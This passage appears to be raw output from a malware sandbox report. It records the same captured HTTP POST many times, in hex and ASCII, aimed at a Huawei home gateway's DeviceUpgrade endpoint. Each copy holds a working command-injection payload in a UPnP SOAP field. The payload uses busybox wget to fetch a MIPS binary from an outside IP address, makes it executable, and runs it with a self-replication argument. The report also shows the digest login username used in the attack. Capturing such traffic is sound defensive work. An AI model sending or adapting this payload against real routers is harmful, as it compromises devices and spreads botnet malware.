70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 